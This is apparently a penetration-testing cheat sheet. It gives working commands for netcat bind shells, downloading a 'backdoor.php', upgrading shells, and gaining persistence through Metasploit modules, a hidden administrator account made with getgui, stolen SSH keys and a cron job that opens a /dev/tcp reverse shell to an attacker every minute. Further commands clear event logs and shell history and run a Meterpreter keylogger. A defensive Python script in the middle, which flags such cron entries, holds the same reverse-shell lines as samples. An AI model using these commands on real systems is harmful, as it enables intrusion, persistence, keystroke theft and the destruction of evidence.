This type of shell is less preferred because the attacker connects directly to the target system, and in most cases inbound (ingress) traffic to the target is blocked or flagged as suspicious.
# Windows (target)
nc -nvlp <target_port> -e cmd.exe
nc.exe -nvlp <target_port> -e cmd.exe
# Linux (target)
nc -nvlp <target_port> -e /bin/bash
# Linux (attacker)
nc -nv <target_ip> <target_port>
# Windows (attacker)
nc.exe -nv <target_ip> <target_port>
# Linux Metasploit (attacker)
use multi/handler
set payload generic/shell_bind_tcp # Try also "linux/x64/shell_bind_tcp"
set rhost <target_ip>
set lport <target_port>
run

# Start web server
python3 -m http.server 8080
python2 -m SimpleHTTPServer 8080
php -S 127.0.0.1:8080
# Download (HTTP Windows)
certutil -urlcache -f http://<host>/backdoor.php backdoor.php
# Download (HTTP Linux)
wget http://<host>/backdoor.php
# Netcat [useful when the victim cannot reach you, but you can]
nc -nvlp <target_port> > backdoor.php # [recipient]
nc -w 3 <ip> <target_port> < backdoor.php # [sender]
# With base64
cat file | base64 -w 0 # get base64 [output is a single continuous line]
echo <output_base64> | base64 -d > file # create file
# Tips
# 1 tip - Progress Indicator in netcat
pv backdoor.php | nc -w 3 <ip> <target_port> # [sender] (install pv)
# 2 tip - Check md5
md5sum backdoor.php
# Note: netcat "-n" option means no DNS (only IP)

Interactive shell
/bin/bash -i # Linux

Fully interactive shell
# 1 Step
python3 -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
# 2 Step
CTRL + Z # Press CTRL + Z to background the process and get back to your host machine
# 3 Step
stty raw -echo; fg
# 4 Step
export TERM=xterm

Automatic
# https://github.com/brightio/penelope
# Currently only Unix shells are fully supported.
# There's basic support (netcat-like interaction + logging)
./penelope.py <port> # Reverse shell
./penelope.py -c <target> <port> # Bind shell

(1) Metasploit: search for a persistence module (Windows). Example: exploit/windows/local/persistence_service (requires admin or SYSTEM privileges). When you want to connect again, start a listener to receive the connection.
(2) Enable RDP
First way, with Metasploit: search enable_rdp (and set the session). Then connect to the victim.
Note: you need a username and password. If you don't have the password, change it with net user <username> <new_pass> (suspicious in a real environment), crack the NTLM hash, or create a new account and add it to the Administrators group.
Second way, with Metasploit/Meterpreter (automatically creates the account and applies the settings):
# In meterpreter
run getgui -e -u user_you_want -p password_you_want
# This enables the RDP service ->
# Creates a new user with the provided parameters ->
# Hides the user from the Windows login screen ->
# Adds the user to the Remote Desktop Users and Administrators groups

(1) Metasploit: search for a persistence module (Linux). Example: post/linux/manage/sshkey_persistence (needs elevated privileges; this module adds an SSH key to a specified user).
(2) Via SSH key: after gaining access to the Linux system, copy the user's SSH private key to your local machine and use it to connect via SSH.
(3) With cron jobs
# 1. Set up listener
# 2. Create a cron job entry (the five asterisks schedule it every minute)
echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/<attacker_ip>/<port> 0>&1'" > cron
# 3. This will replace the user's existing crontab with the contents of 'cron'
crontab cron
# List the current user's crontab
crontab -l
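A defender-side check for the cron persistence just shown, added here as an example and not part of the original cheat sheet: it parses crontab output (for instance `crontab -l` run per user) and flags jobs whose command carries reverse-shell indicators such as a /dev/tcp redirection, `bash -i`, or `nc -e`, noting an every-minute schedule as supporting evidence. The indicator list, the sample crontab and the 203.0.113.5 address are constructed assumptions.

```python
import re
import sys

# Constructed sample crontab: one legitimate job plus two persistence
# entries of the kind this cheat sheet shows (/dev/tcp reverse shell, nc -e).
SAMPLE_CRONTAB = """\
PATH=/usr/bin:/bin
0 3 * * * /usr/local/bin/backup.sh --quiet
* * * * * /bin/bash -c 'bash -i >& /dev/tcp/203.0.113.5/4444 0>&1'
@reboot /usr/bin/nc -e /bin/sh 203.0.113.5 4444
"""

# Indicators matched against the command field; illustrative, not exhaustive (assumption).
COMMAND_INDICATORS = {
    "dev_tcp": re.compile(r"/dev/(tcp|udp)/\S+"),          # bash network redirection
    "interactive_shell": re.compile(r"\b(ba)?sh\s+-i\b"),  # bash -i / sh -i
    "netcat_exec": re.compile(r"\bnc(\.exe)?\b.*\s-e\s"),  # nc -e <shell>
}
EVERY_MINUTE = re.compile(r"^\*\s+\*\s+\*\s+\*\s+\*$")     # "* * * * *" schedule


def parse_crontab(text):
    """Yield (schedule, command) per job line; skip comments, blanks and VAR=value lines."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        if line.startswith("@"):                 # @reboot, @hourly, ...
            schedule, _, command = line.partition(" ")
        else:                                    # five time fields, then the command
            parts = line.split(None, 5)
            if len(parts) < 6:
                continue
            schedule, command = " ".join(parts[:5]), parts[5]
        yield schedule, command.strip()


def find_suspicious_entries(text):
    """Return [(command, [indicator names])] for jobs whose command matches an indicator."""
    findings = []
    for schedule, command in parse_crontab(text):
        hits = [name for name, rx in COMMAND_INDICATORS.items() if rx.search(command)]
        if hits:
            if EVERY_MINUTE.match(schedule):     # a beaconing schedule strengthens the finding
                hits.append("every_minute")
            findings.append((command, hits))
    return findings


if __name__ == "__main__":
    # Usage: crontab -l | python3 check_cron.py   (falls back to the sample without stdin)
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_CRONTAB
    for command, hits in find_suspicious_entries(text):
        print(f"SUSPICIOUS [{', '.join(hits)}]: {command}")
```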
# NOTE: if the cron entry above doesn't connect back, try another reverse shell one-liner

Windows
# Metasploit/Meterpreter
clearev # Clear the Application, System, and Security logs on a Windows system

Linux
history -c # Clear history
cat /dev/null > ~/.bash_history # Same as above

# With metasploit
keyscan_start # Start keylogger
keyscan_dump # Print the captured keystrokes